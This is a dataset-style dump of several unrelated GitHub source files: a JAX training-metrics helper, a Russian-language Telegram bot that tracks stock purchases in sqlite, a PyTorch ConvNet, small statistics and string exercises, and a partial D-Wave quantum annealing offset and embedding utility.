_advance_ema(cur_ema, new_val, beta):\n \"\"\"Advance an exponential moving average.\"\"\"\n return jax.tree_map(lambda cur, new: beta * cur + (1 - beta) * new,\n cur_ema,\n new_val)\n\n\ndef _compute_leaf_norms(pytree):\n \"\"\"Compute the norm of all leaves in a pytree.\"\"\"\n return jax.tree_map(lambda leaf: jnp.linalg.norm(leaf.reshape(-1)), pytree)\n\n\ndef _set_pytree_idx(pytree_of_arrs, new_pytree, idx):\n \"\"\"Incorporate a new pytree into a pytree of arrays.\n\n Args:\n pytree_of_arrs: (pytree) a pytree of float arrays\n new_pytree: (pytree) a pytree of floats\n idx: (int) an index\n\n Returns:\n a pytree where we set the \"idx\" index of each leaf in pytree_of_arrs to\n the corresponding leaf in new_pytree.\n\n \"\"\"\n def set_arr(arr, new_value):\n return arr.at[idx].set(new_value)\n return jax.tree_map(set_arr, pytree_of_arrs, new_pytree)\n","repo_name":"google/init2winit","sub_path":"init2winit/training_metrics_grabber.py","file_name":"training_metrics_grabber.py","file_ext":"py","file_size_in_byte":20676,"program_lang":"python","lang":"en","doc_type":"code","stars":66,"dataset":"github-code","pt":"31"} +{"seq_id":"11981790515","text":"import requests\nimport yfinance\nimport sqlite3\nimport os\nfrom datetime import datetime\nfrom aiogram import Bot, Dispatcher, types, executor\nfrom aiogram.contrib.fsm_storage.memory import MemoryStorage\nfrom aiogram.dispatcher import FSMContext\nfrom aiogram.dispatcher.filters import Command\nfrom aiogram.dispatcher.filters.state import State, StatesGroup\nfrom dotenv import load_dotenv\nload_dotenv()\n\n\napi_token = os.getenv('API_TOKEN')\nprint(\"api_token:\", api_token)\nbot = Bot(token=api_token)\nstorage = MemoryStorage()\ndp = Dispatcher(bot, storage=storage)\n\nclass User:\n def __init__(self, telegram_id):\n self.telegram_id = telegram_id\n\n def check_user_data(self):\n conn = sqlite3.connect('./app_data/database.db')\n cursor = conn.cursor()\n cursor.execute(\"SELECT name FROM sqlite_master WHERE type='table' AND name='users'\")\n result = cursor.fetchone()\n if result is None:\n conn.close()\n return None\n cursor.execute('SELECT * FROM users WHERE telegram_id = ?', (self.telegram_id,))\n result = cursor.fetchone()\n conn.close()\n return result\n\n def create_user_record(self):\n inserted_id = None\n if not self.check_user_data():\n conn = sqlite3.connect('./app_data/database.db')\n cursor = conn.cursor()\n cursor.execute('''CREATE TABLE IF NOT EXISTS users (telegram_id INTEGER PRIMARY KEY)''')\n cursor.execute('INSERT INTO users (telegram_id) VALUES (?)', (self.telegram_id,))\n inserted_id = cursor.lastrowid\n conn.commit()\n conn.close() \n return inserted_id\n\nclass Stock:\n def __init__(self, owner_id, stock_id, quantity, unit_price, purchase_date):\n self.owner_id = owner_id\n self.stock_id = stock_id\n self.quantity = quantity\n self.unit_price = unit_price\n self.purchase_date = purchase_date\n \n def __eq__(self, other):\n if isinstance(other, Stock):\n return (\n self.owner_id == other.owner_id\n and self.stock_id == other.stock_id\n and self.quantity == other.quantity\n and self.unit_price == other.unit_price\n and self.purchase_date == other.purchase_date\n )\n return False\n\n def add_stock(self):\n conn = sqlite3.connect('./app_data/database.db')\n cursor = conn.cursor()\n cursor.execute('''CREATE TABLE IF NOT EXISTS stocks\n (owner_id INTEGER, stock_id TEXT, quantity INTEGER, unit_price REAL, purchase_date TIMESTAMP, FOREIGN KEY (owner_id) REFERENCES users(telegram_id) ON DELETE CASCADE)''')\n values = 
(self.owner_id, self.stock_id, self.quantity, self.unit_price, self.purchase_date)\n cursor.execute('INSERT INTO stocks VALUES (?, ?, ?, ?, ?)', values)\n inserted_id = cursor.lastrowid\n conn.commit()\n conn.close()\n return inserted_id\n\n def get_user_stocks(owner_id):\n stocks = []\n conn = sqlite3.connect('./app_data/database.db')\n cursor = conn.cursor()\n cursor.execute(\"SELECT name FROM sqlite_master WHERE type='table' AND name='stocks'\")\n result = cursor.fetchone()\n if result is None:\n conn.close()\n return stocks\n cursor.execute('SELECT * FROM stocks WHERE owner_id = ?', (owner_id,))\n result = cursor.fetchall()\n conn.close()\n\n for row in result:\n owner_id, stock_id, quantity, unit_price, purchase_date = row\n stock = Stock(owner_id, stock_id, quantity, unit_price, purchase_date)\n stocks.append(stock)\n\n return stocks\n\nclass CheckStockStates(StatesGroup):\n StockID = State()\n\nclass AddStockStates(StatesGroup):\n StockID = State()\n StockPrice = State()\n StockQuantity = State()\n\ndef check_stock_existence(stock_id: str) -> bool:\n url = f\"https://iss.moex.com/iss/securities/{stock_id}.json\"\n \n response = requests.get(url)\n if response.status_code == 200:\n data = response.json()\n exists = data.get(\"boards\", {}).get(\"data\", [])\n return bool(exists)\n else:\n return False\n\ndef get_stock_price_ru(stock_id: str) -> float:\n url = f\"https://iss.moex.com/iss/engines/stock/markets/shares/boards/TQBR/securities/{stock_id}.json?iss.only=securities&securities.columns=PREVPRICE,CURRENCYID\"\n\n response = requests.get(url)\n if response.status_code == 200:\n data = response.json()\n if len(data.get(\"securities\", {}).get(\"data\", [[]])) > 0:\n stock_currency = data.get(\"securities\", {}).get(\"data\", [[]])[0][1]\n if stock_currency == 'SUR':\n stock_currency = 'RUB'\n stock_price = data.get(\"securities\", {}).get(\"data\", [[]])[0][0]\n stock_result = str(stock_price) + ' ' + str(stock_currency)\n return stock_result\n else:\n return None\n else:\n return None\n\ndef get_stock_price_world(stock_id):\n ticker = yfinance.Ticker(stock_id)\n stock_info = ticker.info\n stock_currency = stock_info['currency']\n stock_price = stock_info.get('currentPrice')\n stock_result = str(stock_price) + ' ' + str(stock_currency)\n if stock_price is not None:\n return stock_result\n else:\n return None\n\n@dp.message_handler(Command('start'))\nasync def reg_user(message: types.Message):\n new_user = User(message.from_user.id)\n new_user.create_user_record()\n await message.reply('Добро пожаловать!')\n\n@dp.message_handler(Command('checkStock'))\nasync def check_stock_start(message: types.Message):\n await message.reply('Введите идентификатор ценной бумаги')\n await CheckStockStates.StockID.set()\n\n@dp.message_handler(state=CheckStockStates.StockID)\nasync def check_stock_id(message: types.Message, state: FSMContext):\n stock_id = message.text.upper()\n\n stock_exists = check_stock_existence(stock_id)\n if stock_exists is not False:\n stock_price = get_stock_price_ru(stock_id)\n if stock_price is not None:\n await message.reply(f\"Ценная бумага с идентификатором {stock_id} существует на Московской бирже. Текущий курс: {stock_price}\")\n else:\n stock_price = get_stock_price_world(stock_id)\n if stock_price is not None:\n await message.reply(f\"Ценная бумага с идентификатором {stock_id} существует на Yahoo! Finance. 
Текущий курс: {stock_price}\")\n            else:\n                await message.reply(f\"Ценная бумага с идентификатором {stock_id} существует на Московской бирже, но не продается ни в России, ни за рубежом\")\n    else:\n        await message.reply(f\"Ценная бумага с идентификатором {stock_id} не найдена ни на Московской бирже, ни на Yahoo! Finance.\")\n\n    await state.finish()\n\n@dp.message_handler(Command('addStock'))\nasync def add_stock_start(message: types.Message):\n    await message.reply('Приступим к добавлению ценной бумаги')\n    await bot.send_message(message.chat.id, 'Введите идентификатор приобретенного инструмента')\n    await AddStockStates.StockID.set()\n\n@dp.message_handler(state=AddStockStates.StockID)\nasync def add_stock_id(message: types.Message, state: FSMContext):\n    if message.text != \"/stop\" and message.text != \"/STOP\":\n        stock_exists = check_stock_existence(message.text)\n        if stock_exists is not False:\n            await bot.send_message(message.chat.id, 'Введите стоимость единицы ценной бумаги')\n            async with state.proxy() as data:\n                data['StockID'] = message.text\n            await AddStockStates.StockPrice.set()\n        else:\n            await message.reply('Указанный идентификатор ценной бумаги не найден ни на Московской бирже, ни на Yahoo! Finance.')\n            await bot.send_message(message.chat.id, 'Введите корректный идентификатор приобретенного инструмента или введите /stop для отмены')\n    else:\n        await state.finish()\n        await message.reply('Добавление информации о приобретенной ценной бумаге отменено')\n\n@dp.message_handler(state=AddStockStates.StockPrice)\nasync def add_stock_price(message: types.Message, state: FSMContext):\n    if message.text != '/stop' and message.text != '/STOP':\n        try:\n            float(message.text.replace(',', '.'))\n            await bot.send_message(message.chat.id, 'Введите количество приобретенных единиц инструмента')\n            async with state.proxy() as data:\n                data['StockPrice'] = message.text.replace(',', '.')\n            await AddStockStates.StockQuantity.set()\n        except:\n            await message.reply('Вы некорректно указали стоимость одной ценной бумаги.')\n            await bot.send_message(message.chat.id, 'Введите стоимость приобретения в числовом формате или введите /stop для отмены')\n        \n    else:\n        await state.finish()\n        await message.reply('Добавление информации о приобретенной ценной бумаге отменено')\n\n@dp.message_handler(state=AddStockStates.StockQuantity)\nasync def add_stock_quantity(message: types.Message, state: FSMContext):\n    if message.text != \"/stop\" and message.text != \"/STOP\":\n        try:\n            int(message.text)\n            async with state.proxy() as data:\n                data['StockQuantity'] = message.text\n                data['StockOwnerID'] = message.from_user.id\n                data['StockPurchaseDate'] = datetime.now()\n                StockRecord = Stock(data['StockOwnerID'], data['StockID'], data['StockQuantity'], data['StockPrice'], data['StockPurchaseDate'])\n                StockRecord.add_stock()\n            await state.finish()\n            await bot.send_message(message.chat.id, 'Информация о приобретенной ценной бумаге успешно сохранена!')\n        except:\n            await message.reply('Вы некорректно указали количество приобретенных единиц ценной бумаги.')\n            await bot.send_message(message.chat.id, 'Введите количество в виде целого числа или введите /stop для отмены')\n        \n    else:\n        await state.finish()\n        await message.reply('Добавление информации о приобретенной ценной бумаге отменено')\n\n@dp.message_handler(Command('checkPortfolioSummary'))\nasync def check_portfolio(message: types.Message):\n    user_stocks = Stock.get_user_stocks(message.from_user.id)\n    portfolio_price = 0\n    portfolio_stocks_count = 0\n    for stock in user_stocks:\n        
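# Added note (editor): stored values are summed as-is; the summary reply\n        # below labels the total as RUB, although instruments quoted via Yahoo!\n        # Finance may be priced in other currencies.\n        stock_price = 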
int(stock.quantity) * float(stock.unit_price)\n portfolio_price += stock_price\n portfolio_stocks_count += 1\n await message.reply(f'Вы приобрели {portfolio_stocks_count} раз, на общую сумму {portfolio_price} RUB')\n\n@dp.message_handler(Command('test'))\nasync def test(message: types.Message):\n return_message = User(message.from_user.id).check_user_data()\n await message.reply(return_message)\n\nif __name__ == '__main__':\n executor.start_polling(dp, skip_updates=True)\n\n","repo_name":"MalyshkoA/chat-bot-mipt","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":11944,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"919609372","text":"from torchvision import models\nfrom torch import nn\nimport torch.nn.functional as F\n\n'''\nA simple convnet class for early testing\n'''\nclass ConvNet(nn.Module):\n def __init__(self):\n super(ConvNet, self).__init__()\n\n # Input channels = 3, output channels = 18\n self.conv1 = nn.Conv2d(3, 144, kernel_size=3, stride=1, padding=1)\n self.pool = nn.MaxPool2d(kernel_size=2, stride=2, padding=0)\n\n # 4608 input features, 64 output features (see sizing flow below)\n self.fc1 = nn.Linear(12960000, 64)\n\n # 64 input features, 10 output features for our 10 defined classes\n\n self.fc2 = nn.Linear(64, 2)\n\n def forward(self, x):\n # Computes the activation of the first convolution\n # Size changes from (3, 32, 32) to (18, 32, 32)\n x = F.relu(self.conv1(x))\n\n # Size changes from (18, 32, 32) to (18, 16, 16)\n #x = self.pool(x)\n\n # Reshape data to input to the input layer of the neural net\n # Size changes from (18, 16, 16) to (1, 4608)\n # Recall that the -1 infers this dimension from the other given dimension\n x = x.view(-1, 12960000)\n\n # Computes the activation of the first fully connected layer\n # Size changes from (1, 12960000) to (1, 64)\n x = F.relu(self.fc1(x))\n\n # Computes the second fully connected layer (activation applied later)\n # Size changes from (1, 64) to (1, 10)\n x = self.fc2(x)\n\n return x","repo_name":"svapili/FS2019_ATML_Group2","sub_path":"scripts/SimpleNet.py","file_name":"SimpleNet.py","file_ext":"py","file_size_in_byte":1473,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"17042374539","text":"quantity = int(input())\nstrings = []\nfor i in range(quantity):\n string = input()\n strings.append(string)\nindex = int(input())\nnew_word = ''\nfor i in strings:\n new_word += i[index - 1]\nprint(new_word)","repo_name":"Sepren/Yandex_School_Newbie","sub_path":"lists_classwork/classwork/lab_3.py","file_name":"lab_3.py","file_ext":"py","file_size_in_byte":208,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"2122294921","text":"import random\nimport math\nimport matplotlib.pyplot as plt\nfrom scipy import interpolate\nimport numpy as np\n\ndef getUnif(a:int, b:int):\n alpha = random.random()\n return (b-a) * alpha + a\n\ndef MandD(lis: list):\n\ttemp = list()\n\tfor i in lis:\n\t temp.append(i**2)\n\tM = sum(lis)/10000\n\tprint(\"M = \" + (str) (M))\n\tD = sum(temp)/10000 - M**2\n\tprint(\"D = \" + (str) (D))\n\ndef getExp(beta: float):\n\treturn -beta * math.log(random.random())\n\ndef getP(a:int, b:int, source:list, size:int):\n\ttemp = sorted(source)\n\tk = 0\n\tsumk = 0\n\tj = a + 1\n\tr_values = list()\n\twhile j != b:\n\t\tif(temp[k] <= j):\n\t\t\tk = k + 1\n\t\t\tsumk = sumk + 1\n\t\telse:\n\t\t\tj = j + 
1\n\t\t\tr_values.append(sumk/size)\n\t\t\tsumk = 0\n\t\t\t#continue\n\tfor i in range(size - k):\n\t\tsumk = sumk + 1\n\tr_values.append(sumk/size)\n\treturn r_values\n\ndef getPlotP(source:list, size:int, length:int):\n\tlistY = list()\n\tlistX = list()\n\ttemp = sorted(source)\n\tfor i in range(size):\n\t\tlistY.append(i / size)\n\t\tlistX.append(temp[i])\n\treturn [listX, listY]\n\ndef getXi(N:int):\n\tresult = 0\n\tfor i in range(N):\n\t\tresult = result + getStand2()**2\n\treturn result\n\ndef getStand1():\n\tsum = 0\n\tfor i in range(12):\n\t\talpha = random.random()\n\t\tsum = sum + alpha\n\treturn sum - 6\n\ndef getStand2():\n\talpha = random.random()\n\tbeta = random.random()\n\treturn math.sqrt(-2*math.log(beta)) * math.cos(2*math.pi*(alpha))\n\ndef getStud(N:int):\n\treturn getStand2() / (math.sqrt(getXi(N)/N))\n\nunifList = list()\nfor i in range(10000):\n\tunifList.append(getUnif(0,10))\n\ntask = list()\nfor i in range(20):\n\ttask.append(np.random.normal(3,2))\n\tprint(task[i])\nm = sum(task)/20\ntempTask = list()\nfor i in range(20):\n\ttempTask.append((task[i] - m)**2)\ngDisp = sum(tempTask)/20\ndisp = math.sqrt(20/19 * gDisp)\nprint(disp)\ninterval = 1.7291*disp/math.sqrt(20)\nprint(\"interval: %.2f\" % (m - interval) + \" < m < %.2f\" % (m + interval))\nMandD(unifList)\nplt.bar(['0-1','1-2','2-3','3-4','4-5','5-6','6-7','7-8','8-9','9-10'], getP(0,10,unifList,10000))\nplt.show()\npoly = interpolate.KroghInterpolator([0,1,2,3,4,5,6,7,8,9], getP(0,10,unifList,10000))\nY = poly([0,1,2,3,4,5,6,7,8,9])\nplt.plot([0,1,2,3,4,5,6,7,8,9],Y)\nax = plt.gca()\nax.set_xlim([0, 10])\nax.set_ylim([0, 0.2])\nplt.show()\nX, Y = getPlotP(unifList, 10000, 10)\nplt.plot(X, Y)\nplt.show()\n\nstandList = list()\nstandList1 = list()\nfor i in range(10000):\n\tstandList.append(getStand1())\n\tstandList1.append(getStand2())\nMandD(standList)\nMandD(standList1)\ntemp = getP(((int)(min(standList1))), ((int)(max(standList1))), standList1, 10000)\nX.clear()\nfor i in range(len(temp)):\n\tX.append((str)((int)(min(standList1)) + i) + ' - ' + ((str)((int)(min(standList1)) + i + 1)))\nplt.bar(X, temp)\nplt.show()\nX.clear()\nX.append(len(temp)/2*-1)\nfor i in range(len(temp) - 1):\n\tX.append(temp[0] + i)\npoly = interpolate.KroghInterpolator(X, temp)\nY = poly(X)\nplt.plot(X,Y)\nax = plt.gca()\nax.set_xlim([X[0], X[len(X) - 1]])\nax.set_ylim([0, 0.7])\nplt.show()\nX.clear()\nX, Y = getPlotP(standList1, 10000, 8)\nplt.plot(X, Y)\nplt.show()\ntemp = getP(((int)(min(standList))), ((int)(max(standList))), standList, 10000)\nX.clear()\nfor i in range(len(temp)):\n\tX.append((str)((int)(min(standList)) + i) + ' - ' + ((str)((int)(min(standList)) + i + 1)))\nplt.bar(X, temp)\nplt.show()\nX.clear()\nX.append(len(temp)/2*-1)\nfor i in range(len(temp) - 1):\n\tX.append(temp[0] + i)\npoly = interpolate.KroghInterpolator(X, temp)\nY = poly(X)\nplt.plot(X,Y)\nax = plt.gca()\nax.set_xlim([X[0], X[len(X) - 1]])\nax.set_ylim([0, 0.7])\nplt.show()\nX.clear()\nX, Y = getPlotP(standList, 10000, 8)\nplt.plot(X, Y)\nplt.show()\nexpList = list()\nprint('expList')\nfor i in range(10000):\n\texpList.append(getExp(1))\nMandD(expList)\ntemp = getP(0,(int)(max(expList)),expList,10000)\nX.clear()\nfor i in range(len(temp)):\n\tX.append((str)((int)(min(expList)) + i) + ' - ' + ((str)((int)(min(expList)) + i + 1)))\nplt.bar(X, temp)\nplt.show()\nX.clear()\nfor i in range((int)(max(expList))):\n\tX.append(i)\npoly = interpolate.KroghInterpolator(X, temp)\nY = poly(X)\nplt.plot(X,Y)\nax = plt.gca()\nax.set_xlim([X[0], X[len(X) - 
1]])\nax.set_ylim([0, 0.7])\nplt.show()\nX, Y = getPlotP(expList, 10000, (int)(max(expList)))\nplt.plot(X,Y)\nplt.show()\nlistXi = list()\nfor i in range(10000):\n\tlistXi.append(getXi(10))\nMandD(listXi)\nsupressedMax = (int)(max(listXi))\ntemp = getP(0,supressedMax,listXi,10000)\nX.clear()\n\nfor i in range(supressedMax):\n\tX.append((str)(i) + ' - ' + (str)(i + 1))\nplt.bar(X, temp)\nplt.show()\nX.clear()\nfor i in range(supressedMax):\n\tX.append(i)\npoly = interpolate.KroghInterpolator(X, temp)\nY = poly(X)\nplt.plot(X,Y)\nax = plt.gca()\nax.set_xlim([X[0], X[len(X) - 1]])\nax.set_ylim([0, 0.13])\nplt.show()\nX, Y = getPlotP(listXi, 10000, (int)(max(listXi)))\nplt.plot(X,Y)\nplt.show()\nstudList = list()\nfor i in range(10000):\n\tstudList.append(getStud(10))\nMandD(studList)\ntemp = getP((int)(min(studList)),(int)(max(studList)),studList,10000)\nX.clear()\nfor i in range(len(temp)):\n\tX.append((str)((int)(min(studList) + i)) + ' - ' + (str)((int)(min(studList) + i + 1)))\nplt.bar(X, temp)\nplt.show()\nX.clear()\nfor i in range(len(temp)):\n\tX.append(i)\npoly = interpolate.KroghInterpolator(X, temp)\nY = poly(X)\nplt.plot(X,Y)\nax = plt.gca()\nax.set_xlim([X[0], X[len(X) - 1]])\nax.set_ylim([0, 0.5])\nplt.show()\nX, Y = getPlotP(studList, 10000, (int)(max(studList)))\nplt.plot(X,Y)\nplt.show()\n\n#X, Y = getPlotP(standList1, 10000, (int)(max(standList1)))\n#plt.plot(X, Y)\n#plt.show()\n\n","repo_name":"bingelibangable/matStatLab","sub_path":"matstat3/statlab3.py","file_name":"statlab3.py","file_ext":"py","file_size_in_byte":5350,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"1160176071","text":"import numpy as np\nimport hashlib\n\nfrom minorminer import find_embedding\nfrom dwave.system.composites import FixedEmbeddingComposite\n\nimport matplotlib.pyplot as plt\nimport yaml\n\n\nclass AnnealOffset:\n \"\"\"https://docs.dwavesys.com/docs/latest/c_qpu_0.html#anneal-offsets\n \"\"\"\n\n def __init__(self, tag, graph_params={}):\n self.tag = tag\n self.graph_params = graph_params\n\n def fcn(self, h, offset_min, offset_range):\n h = np.array(h)\n abshrange = max(abs(h)) - min(abs(h))\n fullrange = max(h) - min(h)\n\n if self.tag == \"advproblem\":\n offset_tag = f\"FixEmbedding_AdvanceProblem_{offset_min}_{offset_range}\"\n adv = offset_min + offset_range\n offset_fcn = [adv for q in range(self.graph_params[\"total_vertices\"])]\n nconstraint = self.graph_params[\"total_qubits\"] - self.graph_params[\"total_vertices\"]\n offset_constraint = [offset_min for q in range(nconstraint)]\n offset_fcn.extend(offset_constraint)\n return offset_fcn, offset_tag\n if self.tag == \"advconstraint\":\n offset_tag = f\"FixEmbedding_AdvanceConstraint_{offset_min}_{offset_range}\"\n offset_fcn = [offset_min for q in range(self.graph_params[\"total_vertices\"])]\n adv = offset_min + offset_range\n nconstraint = self.graph_params[\"total_qubits\"] - self.graph_params[\"total_vertices\"]\n offset_constraint = [adv for q in range(nconstraint)]\n offset_fcn.extend(offset_constraint)\n return offset_fcn, offset_tag\n if self.tag == \"constant\":\n return (\n np.zeros(len(h)),\n f\"FixEmbedding_Constant_{offset_min}_{offset_range}_v3_1\",\n )\n if self.tag == \"single_sided_binary\":\n offset_tag = f\"FixEmbedding_Single_Sided_Binary_{offset_min}_z4\"\n offset_fcn = []\n hmid = abshrange * 0.5 + min(abs(h))\n for hi in h:\n if abs(hi) <= hmid:\n if offset_min < 0:\n offset_fcn.append(offset_min)\n else:\n offset_fcn.append(0)\n else:\n if 
offset_min < 0:\n offset_fcn.append(0)\n else:\n offset_fcn.append(-1*offset_min)\n return offset_fcn, offset_tag\n if self.tag == \"binary\":\n offset_tag = f\"FixEmbedding_Binary_{offset_min}_{offset_range}_z0\"\n offset_fcn = []\n hmid = abshrange * 0.5 + min(abs(h))\n for hi in h:\n if abs(hi) <= hmid:\n offset_fcn.append(offset_min)\n else:\n if offset_min < 0:\n offset_fcn.append(offset_min + offset_range)\n else:\n offset_fcn.append(offset_min - offset_range)\n return offset_fcn, offset_tag\n if self.tag == \"test0\":\n offset_tag = \"test0\"\n offset_fcn = [offset_min, 0]\n return offset_fcn, offset_tag\n if self.tag == \"test1\":\n offset_tag = \"test1\"\n offset_fcn = [0, offset_min]\n return offset_fcn, offset_tag\n if self.tag == \"negbinary\":\n offset_tag = f\"FixEmbedding_NegBinary_{offset_min}_{offset_range}_v3_1\"\n offset_fcn = []\n hmid = abshrange * 0.5 + min(abs(h))\n for hi in h:\n if abs(hi) >= hmid:\n offset_fcn.append(offset_min)\n else:\n if offset_min < 0:\n offset_fcn.append(offset_min + offset_range)\n else:\n offset_fcn.append(offset_min - offset_range)\n return offset_fcn, offset_tag\n if self.tag == \"shiftlinear\":\n offset_tag = f\"FixEmbedding_ShiftLinear_{offset_min}_{offset_range}\"\n absshifth = abs(h) - min(abs(h))\n shiftnormh = absshifth / abshrange\n offset_fcn = shiftnormh * offset_range + offset_min\n return offset_fcn, offset_tag\n if self.tag == \"negshiftlinear\":\n offset_tag = f\"FixEmbedding_NegShiftLinear_{offset_min}_{offset_range}\"\n invhnorm = -1 * (abs(h) - max(abs(h))) / abshrange\n offset_fcn = invhnorm * offset_range + offset_min\n return offset_fcn, offset_tag\n if self.tag == \"signedshiftlinear\":\n offset_tag = f\"FixEmbedding_SignedShiftLinear_{offset_min}_{offset_range}\"\n shifth = h - min(h)\n normh = shifth / fullrange\n offset_fcn = normh * offset_range + offset_min\n return offset_fcn, offset_tag\n if self.tag == \"signednegshiftlinear\":\n offset_tag = (\n f\"FixEmbedding_SignedNegShiftLinear_{offset_min}_{offset_range}\"\n )\n shifth = -1 * (h - max(h)) / fullrange\n offset_fcn = shifth * offset_range + offset_min\n return offset_fcn, offset_tag\n if self.tag == \"linear\":\n offset_tag = f\"Linear_{offset_min}_{offset_range}\"\n hnorm = abs(h) / max(abs(h))\n offset_fcn = hnorm * offset_range * 0.9 + offset_min * 0.9\n return offset_fcn, offset_tag\n if self.tag == \"neglinear\":\n hnorm = abs(h) / max(abs(h))\n return (\n -1.0 * hnorm * offset_range * 0.9 + offset_range + offset_min * 0.9,\n f\"Neglinear_{offset_min}_{offset_range}\",\n )\n if self.tag == \"signedlinear\":\n hnorm = 0.5 * (1.0 + h / max(abs(h)))\n return (\n hnorm * offset_range * 0.9 + offset_min * 0.9,\n f\"Signedlinear_{offset_min}_{offset_range}\",\n )\n if self.tag == \"negsignedlinear\":\n hnorm = 0.5 * (1.0 - h / max(abs(h)))\n return (\n hnorm * offset_range * 0.9 + offset_min * 0.9,\n f\"Negsignedlinear_{offset_min}_{offset_range}\",\n )\n else:\n print(\n \"Anneal offset not defined.\\nDefine in AnnealOffset class inside qlp.mds.mds_qlpdb\"\n )\n\n\ndef retry_embedding(\n sampler,\n qubo_dict,\n qpu_graph,\n graph_tag,\n target_min=-0.1,\n target_range=0.12,\n n_tries=100,\n):\n def get_embed_min_max_offset(sampler, embedding):\n embed = FixedEmbeddingComposite(sampler, embedding)\n embedding_idx = [idx for embed_list in embedding.values() for idx in embed_list]\n anneal_offset_ranges = np.array(\n embed.properties[\"child_properties\"][\"anneal_offset_ranges\"]\n )\n min_offset = max(\n [offsets[0] for offsets in 
anneal_offset_ranges[embedding_idx]]\n        )\n        max_offset = min(\n            [offsets[1] for offsets in anneal_offset_ranges[embedding_idx]]\n        )\n        return embed, min_offset, max_offset\n\n    try:\n        with open(\n            f\"../qlp/mds/embeddings/{graph_tag}_{target_min}_{target_range}_v6.yaml\", \"r\"\n        ) as file:\n            embedding = yaml.safe_load(file)\n        embed, min_offset, max_offset = get_embed_min_max_offset(sampler, embedding)\n        embedding_set = {k: set(embedding[k]) for k in embedding}\n        return embed, embedding, min_offset, max_offset\n    except Exception as e:\n        print(e)\n        pass\n\n    for i in range(n_tries):\n        try:\n            embedding = find_embedding(qubo_dict, qpu_graph)\n            embed, min_offset, max_offset = get_embed_min_max_offset(sampler, embedding)\n            if (target_range > max_offset - target_min) or (min_offset > target_min):\n                raise ValueError(\n                    f\"\\n{target_range} > {max_offset - target_min}: Not enough offset range for inhomogeneous driving.\"\n                    f\"\\n{min_offset} > {target_min}: min_offset needs to be lower.\"\n                    \"Try another embedding.\"\n                )\n            else:\n                with open(\n                    f\"../qlp/mds/embeddings/{graph_tag}_{target_min}_{target_range}_v6.yaml\",\n                    \"w\",\n                ) as file:\n                    safe_embed = {int(k): list(embedding[k]) for k in embedding}\n                    yaml.safe_dump(safe_embed, file)\n                return embed, embedding, min_offset, max_offset\n        except Exception as e:\n            # print(e)\n            continue\n\n\ndef plot_anneal_offset(sampler):\n    offsets = np.array(sampler.properties[\"anneal_offset_ranges\"])\n    offset_min = offsets[:, 0]\n    offset_max = offsets[:, 1]\n    fig, axs = plt.subplots(2, 2, figsize=(15, 15), sharey=True, tight_layout=True)\n    axs[0, 0].hist(offset_min, bins=30)\n    axs[0, 0].set_title(\"offset min\")\n    axs[0, 1].hist(offset_max, bins=30)\n    axs[0, 1].set_title(\"offset max\")\n    axs[1, 0].hist(offset_max - offset_min, bins=30)\n    axs[1, 0].set_title(\"offset range\")\n    axs[1, 1].hist(0.5 * (offset_max + offset_min), bins=30)\n    axs[1, 1].set_title(\"offset mean\")\n    plt.draw()\n    plt.show()\n\n\ndef find_offset(h, fcn, embedding, offset_min, offset_range):\n    anneal_offset = np.zeros(2048) # expects full yield 2000Q\n    hlist = []\n    hkey = []\n    for key in h:\n        hlist.append(h[key])\n        hkey.append(key)\n    offset_value, tag = fcn(hlist, offset_min, offset_range)\n    offset_value = {hkey[idx]: offset_value[idx] for idx in range(len(hkey))}\n    offset_dict = dict()\n    for logical_qubit, qubit in embedding.items():\n        for idx in qubit:\n            # sets same offset for all qubits in chain (keyed by the logical qubit)\n            anneal_offset[idx] = offset_value[logical_qubit]\n            offset_dict[idx] = offset_value[logical_qubit]\n    offset_list = []\n    for idx in range(len(embedding)):\n        for qi in embedding[idx]:\n            offset_list.append(offset_dict[qi])\n    return list(anneal_offset), tag, offset_list\n\n\ndef insert_result(graph_params, experiment_params, data_params):\n    from qlpdb.graph.models import Graph as graph_Graph\n    from qlpdb.experiment.models import Experiment as experiment_Experiment\n    from qlpdb.data.models import Data as data_Data\n\n    # select or insert row in graph\n    graph, created = graph_Graph.objects.get_or_create(\n        tag=graph_params[\"tag\"], # Tag for graph type (e.g. 
Hamming(n,m) or K(n,m))\n total_vertices=graph_params[\n \"total_vertices\"\n ], # Total number of vertices in graph\n total_edges=graph_params[\"total_edges\"], # Total number of edges in graph\n max_edges=graph_params[\"max_edges\"], # Maximum number of edges per vertex\n adjacency=graph_params[\n \"adjacency\"\n ], # Sorted adjacency matrix of dimension [N, 2]\n adjacency_hash=graph_params[\n \"adjacency_hash\"\n ], # md5 hash of adjacency list used for unique constraint\n )\n\n # select or insert row in experiment\n experiment, created = experiment_Experiment.objects.get_or_create(\n graph=graph, # Foreign Key to `graph`\n machine=experiment_params[\"machine\"], # Hardware name (e.g. DW_2000Q_5)\n settings=experiment_params[\"settings\"], # Store DWave machine parameters\n settings_hash=experiment_params[\n \"settings_hash\"\n ], # md5 hash of key sorted settings\n p=experiment_params[\"p\"], # Coefficient of penalty term, 0 to 9999.99\n chain_strength=experiment_params[\"chain_strength\"],\n tag=experiment_params[\"tag\"],\n )\n\n # select or insert row in data\n for idx in range(len(data_params[\"spin_config\"])):\n measurement = data_Data.objects.filter(experiment=experiment).order_by(\n \"-measurement\"\n )\n if measurement.exists():\n measurement = measurement.first().measurement + 1\n else:\n measurement = 0\n data, created = data_Data.objects.get_or_create(\n experiment=experiment, # Foreign Key to `experiment`\n measurement=measurement, # Increasing integer field labeling measurement number\n spin_config=list(\n data_params[\"spin_config\"][idx]\n ), # Spin configuration of solution, limited to 0, 1\n chain_break_fraction=9999, #data_params[\"chain_break_fraction\"][idx],\n energy=data_params[\"energy\"][\n idx\n ], # Energy corresponding to spin_config and QUBO\n constraint_satisfaction=data_params[\"constraint_satisfaction\"][idx],\n )\n return data\n\n\ndef graph_summary(tag, graph, qubo):\n \"\"\"\n Get summary statistics of input graph\n :param graph:\n :return:\n \"\"\"\n vertices = np.unique(np.array([i for i in graph]).flatten())\n neighbors = {v: 0 for v in vertices}\n for i in graph:\n neighbors[i[0]] += 1\n neighbors[i[1]] += 1\n params = dict()\n params[\"tag\"] = tag\n params[\"total_vertices\"] = len(vertices)\n params[\"total_edges\"] = 